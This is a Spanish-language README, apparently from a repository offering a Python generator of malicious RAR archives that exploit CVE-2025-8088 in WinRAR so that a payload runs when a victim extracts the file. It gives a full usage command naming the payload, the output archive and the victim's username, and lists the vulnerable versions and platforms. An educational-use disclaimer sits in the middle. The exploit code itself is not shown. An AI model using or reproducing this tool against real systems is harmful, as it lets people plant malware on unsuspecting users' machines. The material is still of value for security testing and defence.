
Generador de exploits basado en Python para CVE-2025-8088 en WinRAR, que crea archivos RAR maliciosos que ejecutan cargas útiles al extraerse para pruebas de seguridad autorizadas.
Este repositorio contiene un generador de archivos RAR maliciosos que abusa de la vulnerabilidad CVE-2025-8088 en WinRAR, permitiendo que un archivo aparentemente legítimo ejecute un payload cuando la víctima lo extrae.
python3 exploit_7.12.py \
-p payload.exe \
-o exploit.rar \
--username [Ojo USUARIO VICTIMA] \
--placeholder-len 200 \
--max-up 12 \
--verbose
python exploit_cli.py --help
---
## ⚠️ Advertencia
Este proyecto es solo para **fines educativos y de investigación**.
No debe utilizarse en sistemas reales sin autorización explícita.
El autor no asume ninguna responsabilidad por el uso indebido.
---
## Versiones vulnerables
### WinRAR – CVE-2025-8088
- Versiones de winrar 7.12 anteriores son VULNERABLE
- Versiones anteriores al parche oficial
- Windows 10 / 11
- Arquitecturas x86 y x64